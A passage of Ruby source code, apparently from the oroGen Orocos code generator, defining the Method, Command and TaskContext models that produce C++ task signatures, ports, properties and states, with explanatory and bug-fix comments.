def argument(name, type, doc = "")
if arguments.size == 4
raise ArgumentError, "Orocos does not support having more than 4 arguments for a method"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
arguments << [name, type, doc]
self
end
# Returns the set of types that this method/command uses, as a
# ValueSet of Typelib::Type classes.
def used_types
arguments.map { |_, t, _| t }
end
# Returns the argument part of the C++ signature for this callable
def argument_signature(with_names = true)
arglist = arguments.map do |name, type, doc|
arg = type.full_name('::', true)
# Non-numeric types are passed by const reference in the generated
# C++ signature.
if !(type < Typelib::NumericType)
arg += " const &"
end
if with_names then "#{arg} #{name}"
else arg
end
end
"(" << arglist.join(", ") << ")"
end
end
# Representation of a RTT method. Instances of this object are usually
# created through TaskContext#method. The generated code will expect
# the class implementation (user-visible part) to define one method, to
# serve the call, with almost the same name that the method itself.
#
# For instance, the following definition
# method('MyMethod')
#
# will require the user-visible part to define
# [return value] myMethod([arguments]);
#
# (note that the first character of the method name has been set to
# lowercase to generate the C++ method name)
#
# The argument list of the C++ method (the first one) can be defined
# using Callable#argument. Its return type by using #returns. The
# default method signature is no return type (i.e. void) and no
# arguments.
#
# The name of the work and completion methods can be changed with
# #method_name.
#
# For instance,
# method('MyMethod').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# method_name('move').
# returns('double')
#
# will require the user-visible part to define
# double move(double x, double y);
class Method < Callable
def initialize(task, name)
super
# The default C++ method name is the declared name with its first
# character lowercased (MyMethod -> myMethod).
@method_name = self.name.dup
method_name[0, 1] = method_name[0, 1].downcase
end
# The argument types plus the return type, if any.
def used_types # :nodoc:
[return_type].compact + super
end
# The return type of this method, as a Typelib::Type object.
# See #returns
attr_reader :return_type
# Sets the return type for this method. +type+ can either be the
# type name or a Typelib::Type object. In both cases, the required
# type must be defined in the component, either because it is part
# of its own toolkit or because it has been imported by a
# Component#load_toolkit call.
def returns(type)
if type
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
end
@return_type = type
self
end
# Returns the C++ signature for this method. Used in code
# generation only.
def signature(with_names = true)
result = ""
if return_type
result << return_type.full_name('::', true)
else
result << "void"
end
if with_names
# The method name can be overridden by passing a block.
result << " " <<
if block_given? then yield
else method_name
end
end
result << argument_signature(with_names)
end
def pretty_print(pp)
pp.text signature(true)
end
# call-seq:
# method_name new_name -> self
# method_name -> current_name
#
# Gets or sets the name of the C++ method which is to be called to
# serve this orocos method. It default to the method name with the
# first character set to lowercase (MyMethod becomes myMethod).
dsl_attribute(:method_name) { |value| value.to_s }
end
# Representation of a RTT command. Instances of this object are usually
# created through TaskContext#command. The generated code will expect
# the class implementation (user-visible part) to define two methods:
# * a _work_ method which is called once when the command is called. This
# method has a boolean return type and should return true if the command
# started, and false otherwise.
# * a _completion_ method which is called while the command is running.
# This method should return true when the command is finished and false
# otherwise.
#
# For instance, the following definition
# command('MyCommand')
#
# will require the user-visible part to define
# bool myCommand([arguments]);
# bool isMyCommandCompleted([arguments]);
#
# (note that the first character of the command name has been set to
# lowercase for the work-method name)
#
# The argument list of the work method (the first one) can be defined
# using Callable#argument. For the completion method, three choices are
# available:
# * no arguments at all
# * the same first argument that the work method
# * all the same arguments than the work method
#
# The default is to have all arguments. This can be changed using
# #completion_no_arguments, #completion_first_argument and
# #completion_all_arguments.
#
# The name of the work and completion methods can be changed with
# #work_method_name and #completion_method_name.
#
# For instance,
# command('my_command').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# work_method_name('move').
# completion_method_name('hasReachedTarget').
# completion_no_arguments.
#
# will require the user-visible part to define
# bool move(double x, double y);
# bool hasReachedTarget();
class Command < Callable
# The C++ method name to be called when the command is invoked (the
# "work" method). This defaults to +name+ with a lowercased first
# letter, but you can customize it by using #work_method_name.
dsl_attribute(:work_method_name) { |name| name.to_s }
# The C++ method name polled to check for command completion.
# This defaults to is+name+Completed, but you can customize it by
# using #completion_method_name.
dsl_attribute(:completion_method_name) { |name| name.to_s }
# Create a new callable object on the specified task and with the
# specified name. The setup of the callable should be done by
# calling the various setup methods after the object has been
# created.
def initialize(task, name)
super
# dup + in-place mutation: lowercase only the first character of
# the work method name (MyCommand => myCommand)
@work_method_name = self.name.dup
work_method_name[0, 1] = work_method_name[0, 1].downcase
@completion_method_name = "is#{name}Completed"
# by default, the completion method takes the same arguments as
# the work method (see #completion_signature_type)
@completion_signature_type = :all_arguments
end
# Which kind of signature do we want for the completion method ?
# It is either +:no_arguments+, +:first_argument+ or +:all_arguments+
# Use #completion_no_arguments, #completion_first_argument or #completion_all_arguments
# to change it
attr_reader :completion_signature_type
# The completion method for this command has no argument at all
def completion_no_arguments; @completion_signature_type = :no_arguments end
# The completion method for this command will be given the same
# first argument than the command method
def completion_first_argument; @completion_signature_type = :first_argument end
# The completion method for this command will be given the same
# arguments than the command method
def completion_all_arguments; @completion_signature_type = :all_arguments end
# A string representing the signature for the C++ work method. If
# +with_names+ is true, the name of the method and the names of the
# arguments are included in the string. If a block is given, its
# return value is used as the method name instead of
# #work_method_name.
def work_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else work_method_name
end
end
result << argument_signature(with_names)
end
# A string representing the signature for the C++ completion
# method. If +with_names+ is true, the name of the method and the
# names of the arguments are included in the string.
#
# The result depends on the completion_signature_type attribute,
# which can be changed by the completion_no_arguments,
# completion_first_argument and completion_all_arguments methods.
def completion_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else completion_method_name
end
end
result << case completion_signature_type
when :no_arguments then "()"
when :first_argument
# keep only the first argument: strip everything from the
# first comma up to the closing parenthesis
argument_signature(with_names).gsub(/,.*\)$/, ")")
when :all_arguments; argument_signature(with_names)
end
result
end
def pretty_print(pp) # :nodoc:
pp.text work_signature(true)
pp.breakable
pp.text completion_signature(true)
end
end
# Representation of TaskContext classes. This is usually created using
# Component#task_context.
#
# In the generated code, two classes are actually generated:
# * the auto-generated code is in <tt>.orogen/tasks/[name]Base.cpp</tt>
# and <tt>.orogen/tasks/[name]Base.hpp</tt>. These files define the
# various attributes related to the task context (i.e. port and
# attribute objects) in an <tt>[component.name]::[name]Base</tt> class.
# * the user-visible code is in <tt>tasks/[name].cpp</tt> and
# <tt>tasks/[name].hpp</tt>. These files are the ones that define the
# <tt>[component.name]::[name]</tt> class, which is a direct subclass
# of the <tt>[component.name]::[name]Base</tt> class.
#
# By default, the +Base+ class derives from the
# <tt>RTT::TaskContext</tt> class. This can be changed by using the
# #subclasses method.
#
# For all task context objects (ports, properties, ...) there is one
# attribute, of the right RTT class, added to the generated TaskContext
# subclass. The attribute name is always the _[object name], so for
# instance the presence of the following statement
# output_port('time', 'double')
#
# will cause a <tt>OutputPort<double></tt> attribute named
# <tt>_time</tt> to be added to the generated class (more specifically,
# to the +Base+ subclass).
class TaskContext
# The component this task is part of
attr_reader :component
# The task name
attr_reader :name
# The subclass of TaskContext which should be used to define this
# class
attr_reader :superclass
# A set of classes the TaskContext has to implement as well
attr_reader :implemented_classes
# A set of Port objects that can be created at runtime
attr_reader :dynamic_ports
# Metaprogramming helper: given +each_name+ and +attribute_name+,
# defines three accessors on the class:
# * all_#{attribute_name}: every object, including those inherited
#   from the superclass chain
# * self_#{attribute_name}: only the objects defined at this level
#   of the hierarchy (the raw instance variable)
# * each_#{each_name}(only_self = false): enumerates the objects,
#   recursing through the superclass chain first unless +only_self+
#   is true. Returns an enumerator when no block is given.
def self.enumerate_inherited_set(each_name, attribute_name = each_name) # :nodoc:
class_eval <<-EOD
def all_#{attribute_name}; each_#{each_name}.to_a end
def self_#{attribute_name}; @#{attribute_name} end
def each_#{each_name}(only_self = false, &block)
if block_given?
if !only_self && superclass
superclass.each_#{each_name}(false, &block)
end
@#{attribute_name}.each(&block)
else
enum_for(:each_#{each_name}, only_self)
end
end
EOD
end
def to_s; "#<#<Orocos::Generation::TaskContext>: #{name}>" end
# Call to declare that this task model is not meant to run in
# practice
def abstract; @abstract = true; end
# True if this task model is only meant to declare an interface, and
# should not be deployed
def abstract?; @abstract end
# Declares that this task context is a subclass of the given
# TaskContext class. +task_context+ can either be a class name or a
# TaskContext instance. In both cases, it must be defined in the
# scope of the enclosing Component object -- i.e. either defined in
# it, or imported by a Component#using_task_library call. Raises
# ArgumentError if no such task context is known.
def subclasses(task_context)
  @superclass = component.find_task_context(task_context)
  raise ArgumentError, "no such task context #{task_context}" unless @superclass
end
# Declares that this task context is also a subclass of the
# following class. +name+ does not have to be a task context class.
def implements(name, include_file = nil)
@implemented_classes << [name, include_file]
end
# True if the task context implements a parent class which matches
# +name+. +name+ can either be a string or a regular expression.
def implements?(name)
class_name == name ||
(superclass && superclass.implements?(name)) ||
@implemented_classes.any? { |class_name, _| name === class_name }
end
##
# :method: required_activity?
#
# True if the current value of default_activity is actually
# required by the task context implementation
attr_predicate :required_activity?, true
##
# :method: required_activity
# :call-seq:
# required_activity 'activity_type', *args
#
# The kind of activity that must be used for this task context. This
# is the name of the corresponding method on the deployment objects.
# See ACTIVITY_TYPES for the list of known activity types.
#
# See also #default_activity
dsl_attribute :required_activity do |type, *args|
if respond_to?(type.to_sym)
send(type.to_sym)
else
default_activity type, *args
end
self.required_activity = true
end
##
# :method: default_activity
# :call-seq:
# default_activity 'activity_type', *args
#
# The kind of activity that should be used by default. This is the
# name of the corresponding method on the deployment objects
# (:periodic, :aperiodic, :slave, :irq_driven, :fd_driven)
#
# This is a default value, i.e. the use of such an activity
# is not mandatory. If #required_activity is set to true, then
# this activity is the only kind of activity that can be used
# with this task context.
#
# See also #required_activity
dsl_attribute :default_activity do |type, *args|
if required_activity? && @default_activity
raise ArgumentError, "the #{default_activity[0]} activity is required, you cannot change it"
end
type = type.to_sym
if !ACTIVITY_TYPES.has_key?(type)
raise ArgumentError, "#{type} is not a valid activity type"
end
[type, *args]
end
# True if this task context is defined by one of our dependencies.
attr_predicate :external_definition?, true
# The name of the header file containing the C++ code which defines
# this task context
def header_file
if external_definition?
library_name, name = self.name.split("::")
"#{library_name.downcase}/#{name}.hpp"
else
"#{component.name.downcase}/#{basename}.hpp"
end
end
# Returns the name without an eventual library name
def basename
library_name, name = self.name.split("::")
name || library_name
end
# True if we are generating for Linux
def linux?; component.linux? end
# True if we are generating for Xenomai
def xenomai?; component.xenomai? end
def class_name
name
end
# Create a new task context in the given component and with
# the given name. If a block is given, it is evaluated
# in the context of the newly created TaskContext object.
#
# TaskContext objects should not be created directly. You should
# use Component#task_context for that.
#
# Raises ArgumentError if +name+ clashes with the project name, or
# is not a valid (possibly ::-namespaced) C++ identifier.
def initialize(component, name)
if name == component.name
raise ArgumentError, "tasks and projects must not have the same name"
elsif name !~ /^(\w+::)*\w+$/
raise ArgumentError, "task names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@component = component
# unless overridden by #subclasses, derive from the component's
# default task superclass
@superclass = component.default_task_superclass
@implemented_classes = []
@name = name
# This is an array, as we don't want to have it reordered
# unnecessarily
@states = Array.new
default_activity 'triggered'
@properties = Array.new
@methods = Array.new
@commands = Array.new
@ports = Array.new
@dynamic_ports = Array.new
@event_ports = Array.new
@initial_state = 'Stopped'
@fixed_initial_state = false
@needs_configuration = false
end
# Helper for #pretty_print: renders one section of the interface
# (e.g. "Ports", "Methods"). Prints "No <name>" when +set+ is empty;
# otherwise prints the section title followed by each element,
# indented by two. Always ends with a breakable separator.
def pretty_print_interface(pp, name, set)
  header = set.empty? ? "No #{name.downcase}" : name
  pp.text(header)
  unless set.empty?
    pp.nest(2) do
      set.each do |element|
        pp.breakable
        element.pretty_print(pp)
      end
    end
  end
  pp.breakable
end
def pretty_print(pp)
pp.text "------- #{name} ------"
pp.breakable
ports = each_port.to_a + each_dynamic_port.to_a
pretty_print_interface(pp, "Ports", ports)
pretty_print_interface(pp, "Properties", each_property.to_a)
pretty_print_interface(pp, "Methods", each_method.to_a)
pretty_print_interface(pp, "Commands", each_command.to_a)
end
# Returns the object in the set attribute +set_name+ for which #name
# returns +name+. Raises ArgumentError if there is none.
def get_object(set_name, name)
  candidates = send("all_#{set_name}")
  match = candidates.find { |candidate| candidate.name == name }
  raise ArgumentError, "there is no #{name} in #{set_name}" unless match
  match
end
# Raises ArgumentError if an object named +name+ is already present
# in the set attribute +set_name+.
#
# This is an internal helper method
def check_uniqueness(set_name, name) # :nodoc:
# Check if that name is a method name in orocos.rb as well ...
# To warn about name clashes
if @orocos_rb.nil?
begin
require 'orocos'
@orocos_rb = true
rescue LoadError
# orocos.rb is not installed: permanently skip the clash check
@orocos_rb = false
end
end
if name.to_str != 'state' && @orocos_rb && !component.kind_of?(ImportedProject)
if Orocos::TaskContext.instance_methods.find { |n| n.to_s == name.to_str }
STDERR.puts "WARN: #{name} is a method name used in orocos.rb"
STDERR.puts "WARN: if you keep that name, you will not be able to use shortcut access in orocos.rb"
STDERR.puts "WARN: for instance, for a property, you will have to do"
STDERR.puts "WARN: my_task.property('#{name}').write(new_value)"
STDERR.puts "WARN: instead of the shorter and clearer"
STDERR.puts "WARN: my_task.#{name} = new_value"
end
end
# the actual uniqueness check, against this class and its superclasses
set = send("all_#{set_name}")
if set.find { |o| o.name == name }
raise ArgumentError, "there is already a #{name} in #{set_name}"
end
end
private :check_uniqueness
# Add in +self+ the ports of +other_model+ that don't exist.
#
# Raises ArgumentError if +other_model+ has ports whose name is used
# in +self+, but for which the definition is different.
def merge_ports_from(other_model)
  other_model.each_port do |p|
    # BUG FIX: the conflict lookup must be done on +self+, not on
    # +other_model+ (which trivially always contains +p+, so the
    # mismatch check could never fire and no port was ever merged).
    # We use each_port.find rather than #port because #port raises
    # when the port does not exist.
    self_port = each_port.find { |sp| sp.name == p.name }
    if self_port
      if (self_port.class != p.class || self_port.type != p.type)
        raise ArgumentError, "cannot merge as the output port #{self_port.name} have different meanings"
      end
    else
      @ports << p
    end
  end
end
# If true, then the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state?; @fixed_initial_state || needs_configuration? || (superclass.fixed_initial_state? if superclass) end
# Declares that the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state; @fixed_initial_state = true end
# If true, the task context will start in the PreOperational state,
# and will not be able to run until configure() has been called and
# returned true.
#
# When subclassing, it is NOT possible to have a subclass starting
# in the Stopped state while its superclass starts from
# PreOperational.
def needs_configuration?; @needs_configuration || (superclass.needs_configuration? if superclass) end
# Declares that this task needs to be configured before it is
# started (i.e. its initial state will be PreOperational instead of
# Stopped).
#
# If #fixed_initial_state? returns true, then this method raises
# ArgumentError. This is done so that it is possible to declare
# that some task contexts's implementation require the initial
# state to be either PreOperational or Stopped.
def needs_configuration
if superclass && superclass.fixed_initial_state?
raise ArgumentError, "cannot change the start state of this task context: the superclass #{superclass.name} does not allow it"
elsif fixed_initial_state? && !needs_configuration?
raise ArgumentError, "cannot change the start state of this task context: #fixed_initial_state has been specified for it"
end
@needs_configuration = true
end
# Create a new property with the given name, type and default value
# for this task. This returns the Property instance representing
# the new property, whose methods can be used to configure the
# property further. +type+ is the type name for that attribute. It
# can be either in Typelib notation (/std/string) or in C++
# notation (std::string). This type must be defined either by the
# component's own toolkit, or by toolkits imported with
# Component#load_toolkit.
#
# The generated task context will have a <tt>_[property name]</tt>
# attribute of class RTT::Property<type>.
#
# For instance, the following definition
# property('device_name', '/std/string/, '').
# doc 'the device name to connect to'
#
# Will generate a task context with a <tt>_device_name</tt>
# attribute of type RTT::Property<std::string>.
def property(name, type, default_value = nil)
check_uniqueness :properties, name
type = component.find_type(type)
@properties << Property.new(self, name, type, default_value)
@properties.last
end
# Asks orogen to implement the extended state support interface in
# the Base class. This adds:
# * a 'state' output port in which the current task's state is written
# * an enumeration type named CLASS_NAME_STATES in which one value
#   is defined for each states
#
# Note that, for all of this to work, it is actually required that
# all the hooks overloaded in the task's class call their parent in
# the call chain.
def extended_state_support
  state_port = each_port.find { |p| p.name == "state" }
  if state_port
    if state_port.kind_of?(InputPort)
      raise ArgumentError,
        "there is already an input port called 'state', cannot enable extended state support"
    elsif state_port.type_name != "/int"
      # BUG FIX: this called state_port.typename (the accessor is
      # type_name, as used in the condition above) and the message
      # was missing its closing parenthesis
      raise ArgumentError,
        "there is already an output port called 'state', but it is not of type 'int' (found #{state_port.type_name})"
    end
  else
    output_port 'state', '/int'
  end
  # Force toolkit generation. The toolkit code will take care of
  # generating the state enumeration type for us
  component.toolkit(true)
  @extended_state_support = true
end
# True if the extended state support is enabled
def extended_state_support?
@extended_state_support || (superclass.extended_state_support? if superclass)
end
# Returns true if the given state name is already used
def state?(name)
state_kind(name) || (superclass.state?(name.to_s) if superclass)
end
# The set of valid state categories (see #define_state)
STATE_TYPES = [ :toplevel, :runtime, :error, :fatal ]
# Internal method for state definition
#
# +type+ must be one of STATE_TYPES. Enables extended state support
# if it is not enabled yet, then registers the state, keeping
# @states sorted by state name. Raises ArgumentError if +name+ is
# already defined with a different type.
def define_state(name, type) # :nodoc:
name = name.to_s
type = type.to_sym
if !STATE_TYPES.include?(type)
raise ArgumentError, "unknown state type #{type.inspect}"
end
if !extended_state_support?
extended_state_support
end
if kind = state_kind(name.to_s)
if kind != type
raise ArgumentError, "state #{name} is already defined as #{kind}, cannot overload into #{type}"
end
else
@states << [name, type]
@states = @states.sort_by { |n, _| n }
end
end
# Returns what kind of state +name+ is
def state_kind(name) # :nodoc:
if s = each_state.find { |n, t| n == name }
s[1]
end
end
# Returns the type name for the state enumeration
def state_type_name # :nodoc:
"#{basename}_STATES"
end
# Returns the C++ value name for the given state when defined
# globally
def state_global_value_name(state_name, state_type) # :nodoc:
"#{basename}_#{state_name.upcase}"
end
# Returns the C++ value name for the given state when defined in the
# associated class scope.
def state_local_value_name(state_name, state_type) # :nodoc:
state_name.upcase
end
##
# :method: each_runtime_state
#
# Enumerates all the runtime states
#
# See also #each_error_state, #each_fatal_state and #each_state
##
# :method: each_error_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_fatal_state, and #each_state
##
# :method: each_fatal_state
#
# Enumerates all fatal error states defined for this task context
#
# See also #each_runtime_state, #each_error_state and #each_state
STATE_TYPES.each do |type|
class_eval <<-EOD
def each_#{type}_state
if block_given?
each_state do |name, type|
yield(name) if type == :#{type}
end
else
enum_for(:each_#{type}_state)
end
end
EOD
end
# Enumerates each state defined on this task context as [name, type]
# pairs, starting with the states inherited from the superclass
# chain. Returns an enumerator if no block is given.
def each_state(&block)
  return enum_for(:each_state) unless block_given?
  superclass.each_state(&block) if superclass
  @states.each(&block)
end
# call-seq:
# states -> set of states
#
# Declares a toplevel state. It should be used only to declare RTT's
# TaskContext states.
def states(*state_names) # :nodoc:
if state_names.empty?
return @states
end
state_names.each do |name|
define_state(name, :toplevel)
end
end
# Declares a certain number of runtime states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #error_states, #each_state, #each_runtime_state
def runtime_states(*state_names)
state_names.each do |name|
define_state(name, :runtime)
end
end
# Declares a certain number of runtime error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #each_state, #each_error_state
def error_states(*state_names)
state_names.each do |name|
define_state(name, :error)
end
end
# Declares a certain number of fatal error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #error_states, #each_state, #each_error_state
def fatal_states(*state_names)
state_names.each do |name|
define_state(name, :fatal)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/boost/shared_ptr</Image>'
#
# you can write
#
# input_port 'image', shared_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def shared_ptr(name)
base_type = component.find_type(name)
full_name = "/boost/shared_ptr<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { shared_ptr(name) }
component.find_type(full_name)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/RTT/ReadOnlyPointer</Image>'
#
# you can write
#
# input_port 'image', ro_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def ro_ptr(name)
base_type =
begin
component.find_type(name)
rescue Typelib::NotFound
raise ArgumentError, "type #{name} is not available"
end
full_name = "/RTT/ReadOnlyPointer<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { ro_ptr(name) }
component.find_type(full_name)
end
end
# Create a new method with the given name. Use the returned Method
# object to configure the method further.
#
# In Orocos, a method is a synchronous method call to a task context:
# the caller will block until the method's procedure is called
def method(name)
@methods << Method.new(self, name)
@methods.last
end
# The set of commands that have been added at this level of the
# class hierarchy, i.e. commands that are not already defined on the
# superclass.
def new_commands
  super_names = superclass.all_commands.map(&:name).to_set
  @commands.find_all do |t|
    # BUG FIX: +t+ is a Command object while +super_names+ holds
    # name strings; the membership test must use t.name (the old
    # code always returned every command)
    !super_names.include?(t.name)
  end
end
# The set of commands that are overloaded in this task class, i.e.
# commands defined here whose name already exists on the superclass.
def overloaded_commands
  super_names = superclass.all_commands.map(&:name).to_set
  @commands.find_all do |t|
    # BUG FIX: overloaded commands are the ones whose name DOES
    # exist in the superclass; the old code both negated the test
    # and compared the Command object itself against a set of names
    super_names.include?(t.name)
  end
end
# Create a new command with the given name. Use the returned
# Command object to configure the method further. In Orocos, a
# command is an asynchronous method call to a task context.
#
# The generated class will have a <tt>_[command name]</tt>
# attribute of class RTT::Command<>. For instance,
#
# command('my_command').
# doc 'description of command'
#
# will generate an attribute <tt>_my_command</tt> of type
# RTT::Command. The
def command(name)
@commands << Command.new(self, name)
@commands.last
end
##
# :method: each_dynamic_port
# :call-seq:
# each_dynamic_port(only_self = false) { |port| }
#
# Yields all dynamic ports that are defined on this task context.
##
# :method: all_dynamic_ports
# :call-seq:
# all_dynamic_ports -> set_of_ports
#
# Returns the set of all dynamic ports that are defined on this task
# context
##
# :method: self_dynamic_ports
# :call-seq:
# self_dynamic_ports -> set_of_ports
#
# Returns the set of dynamic ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("dynamic_port", "dynamic_ports")
##
# :method: each_port
# :call-seq:
# each_port(only_self = false) { |port| }
#
# Yields all static ports that are defined on this task context.
##
# :method: all_ports
# :call-seq:
# all_ports -> set_of_ports
#
# Returns the set of all static ports that are defined on this task
# context
##
# :method: self_ports
# :call-seq:
# self_ports -> set_of_ports
#
# Returns the set of static ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("port", "ports")
##
# :method: each_property
# :call-seq:
# each_property(only_self = false) { |property| }
#
# Yields all properties that are defined on this task context.
##
# :method: all_properties
# :call-seq:
# all_properties -> set_of_properties
#
# Returns the set of all properties that are defined on this task
# context
##
# :method: self_properties
# :call-seq:
# self_properties -> set_of_properties
#
# Returns the set of properties that are added at this level of the
# model hierarchy. I.e. properties that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("property", "properties")
##
# :method: each_command
# :call-seq:
# each_command(only_self = false) { |command| }
#
# Yields all commands that are defined on this task context.
##
# :method: all_commands
#
# :call-seq:
# all_commands -> set_of_commands
#
# Returns the set of all commands that are defined on this task
# context
##
# :method: self_commands
# :call-seq:
# self_commands -> set_of_commands
#
# Returns the set of commands that are added at this level of the
# model hierarchy. I.e. commands that are either newly defined on
# this task context, or overload commands from the parent models.
enumerate_inherited_set("command", "commands")
##
# :method: each_method
# :call-seq:
# each_method(only_self = false) { |method| ... }
#
# Yields all methods that are defined on this task context.
##
# :method: all_methods
# :call-seq:
# all_methods -> set_of_methods
#
# Returns the set of all methods that are defined on this task
# context
##
# :method: self_methods
# :call-seq:
# self_methods -> set_of_methods
#
# Returns the set of methods that are added at this level of the
# model hierarchy. I.e. methods that are either newly defined on
# this task context, or overload methods from the parent models.
enumerate_inherited_set("method", "methods")
# Methods that are added by this task context (i.e. methods that are
# defined there but are not present in the superclass)
def new_methods
  super_names = superclass.all_methods.map(&:name).to_set
  @methods.find_all do |t|
    # BUG FIX: +t+ is a Method object while +super_names+ holds
    # name strings; the membership test must use t.name (the old
    # code always returned every method)
    !super_names.include?(t.name)
  end
end
# call-seq:
#   output_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding OutputPort object. Raises ConfigError if +type+ is
# not a declared type.
#
# See also #input_port
def output_port(name, type)
  check_uniqueness(:ports, name)
  created = OutputPort.new(self, name, type)
  @ports << created
  created
rescue Typelib::NotFound
  raise ConfigError, "type #{type} is not declared"
end
# Enumerates the output ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_output_port(&block)
each_port.
find_all { |p| p.kind_of?(OutputPort) }.
each(&block)
end
# Returns the port named +name+ or raises ArgumentError if no such
# port exists
def port(name)
  found = each_port.find { |candidate| candidate.name == name }
  raise ArgumentError, "#{self} has no port named '#{name}'" unless found
  found
end
# call-seq:
# input_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding InputPort object.
#
# See also #output_port
def input_port(name, type)
check_uniqueness(:ports, name)
@ports << InputPort.new(self, name, type)
@ports.last
rescue Typelib::NotFound
raise ConfigError, "type #{type} is not declared"
end
# call-seq:
# dynamic_input_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_input_port(name, type)
dynamic_ports << DynamicInputPort.new(self, name, type)
dynamic_ports.last
end
# call-seq:
# dynamic_output_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_output_port(name, type)
dynamic_ports << DynamicOutputPort.new(self, name, type)
dynamic_ports.last
end
# Returns true if there is a dynamic port definition that matches
# the given name and type pair.
#
# If +type+ is nil, the type is ignored in the matching.
def dynamic_port?(name, type)
dynamic_input_port?(name, type) || dynamic_output_port?(name, type)
end
# Returns the set of dynamic input port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_input_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(InputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if there is an input port definition that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def dynamic_input_port?(name, type = nil)
!find_dynamic_input_ports(name, type).empty?
end
# Returns the set of dynamic output port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_output_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(OutputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if an output port of the given name and type could be
# created at runtime.
def dynamic_output_port?(name, type = nil)
!find_dynamic_output_ports(name, type).empty?
end
# Enumerates the input ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_input_port(&block)
each_port.
find_all { |p| p.kind_of?(InputPort) }.
each(&block)
end
# A set of ports that will trigger this task when they get updated.
attr_reader :event_ports
# Declares that this task context is designed to be woken up when
# new data is available on one of the given ports (or all already
# defined ports if no names are given).
def port_driven(*names)
names = names.map { |n| n.to_s }
relevant_ports = if names.empty? then all_ports.find_all { |p| p.kind_of?(InputPort) }
else
names.map do |n|
obj = get_object(:ports, n)
if !obj.kind_of?(InputPort)
raise ArgumentError, "only read ports can be used as triggers for a task context"
end
obj
end
end
@event_ports.concat(relevant_ports)
end
# Declares that this task context is designed to be woken up when
# new data is available on a I/O file descriptor. The resulting task
# must also use the fd_driven activity, which is done by default.
#
# The only thing you have to do in the implementation is therefore
#
# task = task("MyDFDrivenTask").
# start
#
# To configure the activity, you will have to implement the
# getFileDescriptor() method that is generated in the target class.
def fd_driven
default_activity "fd_driven"
needs_configuration
end
# True if this task context's default activity is a FD-driven activity
def fd_driven?
    activity_type, = default_activity
    activity_type == :fd_driven
end
# The set of task libraries from which we depend on, because of our
# superclasses and implements
def used_task_libraries
    component.used_task_libraries.find_all do |library|
        # We depend on +library+ if one of the task models it defines
        # is implemented by this task context
        library.tasks.any? do |task_model|
            task_model.component == library && implements?(task_model.name)
        end
    end
end
# Returns the set of types that are used to define this task
# context, as an array of subclasses of Typelib::Type.
def interface_types
    interface_objects = all_properties + all_methods + all_commands + all_ports
    interface_objects.
        flat_map { |obj| obj.used_types }.
        to_value_set.to_a
end
# Returns the set of toolkits that define the types used in this
# task's interface. They are required at compile and link time
# because of the explicit instanciation of interface templates
# (ports, ...)
def used_toolkits
    types = interface_types
    component.used_toolkits.find_all do |toolkit|
        types.any? { |type| toolkit.includes?(type.name) }
    end.to_value_set
end
# Generate the code files for this task. This builds to classes:
#
# * a #{task.name}Base class in .orogen/tasks/#{task.name}Base.{cpp,hpp}
#   which is the automatically generated part of the task.
# * a #{task.name} class in tasks/#{task.name}.{cpp,hpp} which is
#   the user-provided part of the task. This class is a public
#   subclass of the Base class.
def generate
    # Task contexts coming from dependencies are not generated here
    return if external_definition?
    # Make this task be available in templates as 'task'
    task = self
    base_code_cpp = Generation.render_template 'tasks', 'TaskBase.cpp', binding
    base_code_hpp = Generation.render_template 'tasks', 'TaskBase.hpp', binding
    # Base classes go into the automatic area (regenerated every run)
    Generation.save_automatic "tasks", "#{basename}Base.cpp", base_code_cpp
    Generation.save_automatic "tasks", "#{basename}Base.hpp", base_code_hpp
    code_cpp = Generation.render_template "tasks", "Task.cpp", binding
    code_hpp = Generation.render_template "tasks", "Task.hpp", binding
